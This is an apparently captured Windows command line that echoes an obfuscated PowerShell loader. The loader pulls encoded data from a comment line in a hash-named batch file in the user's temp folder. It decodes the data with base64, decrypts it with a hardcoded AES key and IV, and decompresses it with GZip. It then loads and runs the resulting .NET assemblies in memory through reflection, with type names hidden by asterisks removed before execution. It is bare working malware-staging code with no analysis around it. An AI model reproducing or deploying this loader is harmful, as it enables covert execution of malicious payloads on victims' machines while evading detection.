C:\Windows\system32\cmd.exe /S /D /c" echo function LLppO($CPtuP){ $YqYGn=[System.Security.Cryptography.Aes]::Create(); $YqYGn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $YqYGn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $YqYGn.Key=[System.Convert]::FromBase64String('nKDQKPFRDB4UaeLOndYu+4k+Q0wQVZw47HPOfUUgfBg='); $YqYGn.IV=[System.Convert]::FromBase64String('UfEYRi/5OKMR5zSX3oNZ8w=='); $BfudD=$YqYGn.CreateDecryptor(); $SnIMa=$BfudD.TransformFinalBlock($CPtuP, 0, $CPtuP.Length); $BfudD.Dispose(); $YqYGn.Dispose(); $SnIMa;}function OnLZm($CPtuP){ IEX '$rTpAl=New-Object System.IO.M*em*or*yS*tr*ea*m(,$CPtuP);'.Replace('*', ''); IEX '$Zfmrm=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$HkwXH=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($rTpAl, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $HkwXH.CopyTo($Zfmrm); $HkwXH.Dispose(); $rTpAl.Dispose(); $Zfmrm.Dispose(); $Zfmrm.ToArray();}function IgGdL($CPtuP,$sHjZk){ IEX '$GqVau=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$CPtuP);'.Replace('*', ''); IEX '$jCGEA=$GqVau.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jCGEA.*I*n*v*o*k*e*($null, $sHjZk);'.Replace('*', '');}$jvfbU = 'C:\Users\Admin\AppData\Local\Temp\3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b.bat';$host.UI.RawUI.WindowTitle = $jvfbU;$LDiXZ=[System.IO.File]::ReadAllText($jvfbU).Split([Environment]::NewLine);foreach ($YMuuu in $LDiXZ) { if ($YMuuu.StartsWith(':: ')) { $qgoDd=$YMuuu.Substring(3); break; }}$cHpKY=[string[]]$qgoDd.Split('\');IEX '$kTXqv=OnLZm (LLppO ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($cHpKY[0])));'.Replace('*', '');IEX '$OpwNO=OnLZm (LLppO ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($cHpKY[1])));'.Replace('*', '');IgGdL $kTXqv $null;IgGdL $OpwNO (,[string[]] ('')); "